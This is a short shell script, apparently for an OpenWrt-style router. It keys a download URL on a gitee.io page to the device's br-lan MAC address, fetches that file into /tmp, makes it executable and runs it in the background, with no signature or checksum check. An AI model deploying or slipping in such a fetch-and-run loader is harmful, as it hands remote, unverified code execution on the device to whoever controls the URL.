#!/bin/sh

MAC=`cat /sys/class/net/br-lan/address`
FILE_NAME=`echo $MAC | sed "s/:/-/g"`
URL="https://qq179055016.gitee.io/static/$FILE_NAME"

wd=/tmp/connect
mkdir -p $wd

dl() {
    local url=$1
    local fn=$wd/${url##*/}

    if [ -f "$fn" ]; then
        cat $fn #d
        sh $fn &
        return 0
    fi

    ret=`curl -L -o $fn -s -w %{http_code} --connect-timeout 5 $url | tail -n1`
    if [ "$ret" == "200" ]; then
        date +%s > $fn-u
        cat $fn-u #d
        echo 0 > $fn-timeout
        cat $fn-timeout #d
        chmod +x $fn
        cat $fn #d
        sh $fn &
        return 0
    else
        rm -rf $fn
    fi

    if [ ! -f "$fn-timeout" ]; then
        echo 0 > $fn-timeout
        cat $fn-timeout #d
    fi

    timeout=`cat $fn-timeout`
    let timeout++
    echo $timeout > $fn-timeout
    cat $fn-timeout #d

    return 1
}

dl $URL 
exit $?
